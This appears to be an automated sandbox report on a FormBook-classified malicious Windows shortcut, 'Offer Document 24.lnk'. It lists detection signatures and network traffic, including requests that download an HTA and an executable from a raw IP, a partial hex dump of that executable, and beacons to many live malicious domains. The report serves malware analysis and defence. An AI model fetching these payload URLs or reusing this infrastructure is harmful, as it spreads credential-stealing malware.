Windows Analysis Report
Offer Document 24.lnk

Overview

General Information

Sample name: Offer Document 24.lnk
Analysis ID: 1446727
MD5: bf9569f5e56e6dcb1f4ae60fd2faea36
SHA1: 1085e4140bf323df085db50b8f79c3b02b4aab72
SHA256: 59f149ffc55554ce0aac7072bba999b5abb83b023486e017f407883f8a27e4e2
Tags: lnk
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected FormBook
AI detected suspicious sample
Found URL in windows shortcut file (LNK)
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows shortcut file (LNK) contains suspicious command line arguments
Checks if the current process is being debugged
Connects to several IPs in different countries
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Offer Document 24.lnk Avira: detected
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: https://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.empowermedeco.com/fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL Avira URL Cloud: Label: malware
Source: http://www.magmadokum.com/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.kasegitai.tokyo/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.660danm.top/fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== Avira URL Cloud: Label: malware
Source: http://www.elettrosistemista.zip/fo8o/ Avira URL Cloud: Label: malware
Source: http://www.techchains.info/fo8o/ Avira URL Cloud: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\rooma.exe Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\room4[1].hta Avira: detection malicious, Label: VBS/Dldr.Agent.VPLT
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\rooma.exe ReversingLabs: Detection: 65%
Multi AV Scanner detection for submitted file
Source: Offer Document 24.lnk ReversingLabs: Detection: 28%
Yara detected FormBook
Source: Yara match File source: 7.2.rooma.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.3833199808.0000000002550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836687746.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1603904301.00000000009B1000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1604384036.00000000014C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3836874954.0000000002C50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3837430947.00000000023A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1605472328.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3837329475.00000000047F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\rooma.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Offer Document 24.lnk Joe Sandbox ML: detected
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TmjHHkXnMrncRmISMzN.exe, 00000009.00000000.1509569142.000000000093E000.00000002.00000001.01000000.0000000F.sdmp, TmjHHkXnMrncRmISMzN.exe, 0000000E.00000002.3835791567.000000000093E000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: wntdll.pdbUGP source: rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: rooma.exe, rooma.exe, 00000007.00000003.1492774840.00000000013AE000.00000004.00000020.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.00000000016FE000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000002.1604431863.0000000001560000.00000040.00001000.00020000.00000000.sdmp, rooma.exe, 00000007.00000003.1490722054.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 0000000A.00000002.3837688346.000000000304E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1606101390.0000000002D06000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000003.1604040485.0000000002B16000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 0000000A.00000002.3837688346.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdb source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netbtugc.pdbGCTL source: rooma.exe, 00000007.00000003.1572934772.000000000101D000.00000004.00000020.00020000.00000000.sdmp, TmjHHkXnMrncRmISMzN.exe, 00000009.00000002.3835614650.0000000000E38000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 10_2_0256BAB0 FindFirstFileW,FindNextFileW,FindClose, 10_2_0256BAB0
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then xor eax, eax 10_2_02559480
Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 4x nop then pop edi 10_2_0255DD45
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then pop edi 14_2_023A7ACF
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then pop edi 14_2_023A79C8
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then pop edi 14_2_023B7693
Source: C:\Program Files (x86)\QiaIEkSaKRjYgraAccrwCxYevAdoYwcGJiViCUCiHSVvXqyFaUAdZZI\TmjHHkXnMrncRmISMzN.exe Code function: 4x nop then xor eax, eax 14_2_023ABF3A

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2024449 ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl 192.168.2.8:49705 -> 20.86.128.223:80
Performs DNS queries to domains with low reputation
Source: DNS query: www.joyesi.xyz
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 12
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 23 May 2024 18:20:17 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 23 May 2024 10:27:58 GMTETag: "42200-6191c8140a322"Accept-Ranges: bytesContent-Length: 270848Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 45 52 e8 00 00 00 00 58 83 e8 09 8b c8 83 c0 3c 8b 00 03 c1 83 c0 28 03 08 ff e1 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 79 01 09 a0 3d 60 67 f3 3d 60 67 f3 3d 60 67 f3 1a a6 a8 f3 3a 60 67 f3 1a a6 aa f3 3c 60 67 f3 1a a6 ab f3 3c 60 67 f3 52 69 63 68 3d 60 67 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 01 00 c1 68 85 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 10 04 00 00 00 00 00 00 00 00 00 d0 15 00 00 00 10 00 00 00 20 04 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 0f 04 00 00 10 00 00 00 10 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /room/rooma.exe HTTP/1.1Host: 20.86.128.223Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
Source: Joe Sandbox View IP Address: 185.237.107.49 185.237.107.49
Source: Joe Sandbox View IP Address: 116.50.37.244 116.50.37.244
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UA-WEECOMI-ASUA UA-WEECOMI-ASUA
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: unknown TCP traffic detected without corresponding DNS query: 20.86.128.223
Source: global traffic HTTP traffic detected: GET /room/room4.hta HTTP/1.1Accept: */*Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 20.86.128.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /room/rooma.exe HTTP/1.1Host: 20.86.128.223Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8r+KEwUMhhIOLRL5gTEM7bFlULXRyxxVa+trARU9e5ZGGZA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.kasegitai.tokyoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaF2yArpDgvi6oTdq6vPucKXgoaIsT3InbTvvq+zcnCyLgXuQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.goldenjade-travel.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6ZdmVZ54UmbyKF16zvv1yGe3hSwRWBn0bZic9A2kho+UJ9gA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.antonio-vivaldi.mobiConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjKEsqfuFkq5cAQSWi7WA8E0wwXs8UZjiSCj3RZ8cyRYh4cA== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.magmadokum.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNup0fu2K1aHG/1RRjejs3ag7ONVYGhhFLwGMDRFljOPFYJw==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.rssnewscast.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd68f41LHWk1tWVOcLO2B4JSrTHSWnbApQ5HDH0jFdh0bEA==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.techchains.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMLyJvXbOnx1XXjd4sQOb9JZJsSiXIk2nToiXJsgHURydTcQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.elettrosistemista.zipConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=l+301ZvITCxaX9AHm1YsL655mgOT9ufJgzctOQx29qSsrxX8kw49ykgmumiYYU42xMGxVig5KVZrJosPbs9pFBqtQGck9fp1rRtCXud2beKokCA0CIPwH0kByjXVEoJ79g==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.donnavariedades.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=tDTx8bBUOSgexthNYhTwmnqDpn1F4phVVMPWlhfWjKtbZMSfqXUeuAC/LbGtiEkR5FBEpxKkD9uJRHkvbrmrOfHwa9C8Q+9ZQoBQJyEcpoFJdl2tDobRnKnc0fEkX8JY0Q== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.660danm.topConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?Plm0mn68=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&kzN4Y=k0xDPL HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic HTTP traffic detected: GET /fo8o/?kzN4Y=k0xDPL&Plm0mn68=4jpq/azRsxa5RUjY86tNWfjSBjUfGmQA/bC5edk8IUrTRSqWoRPa/8wzulAZuqVnvDzKNkDL1IzsWztH+C0vz/DDu79arRp32UcJsNkv7g6dr0ICiHZvS3tESvUt5oYRbw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enHost: www.joyesi.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic DNS traffic detected: DNS query: www.techchains.info
Source: global traffic DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic DNS traffic detected: DNS query: www.660danm.top
Source: global traffic DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic DNS traffic detected: DNS query: www.k9vyp11no3.cfd
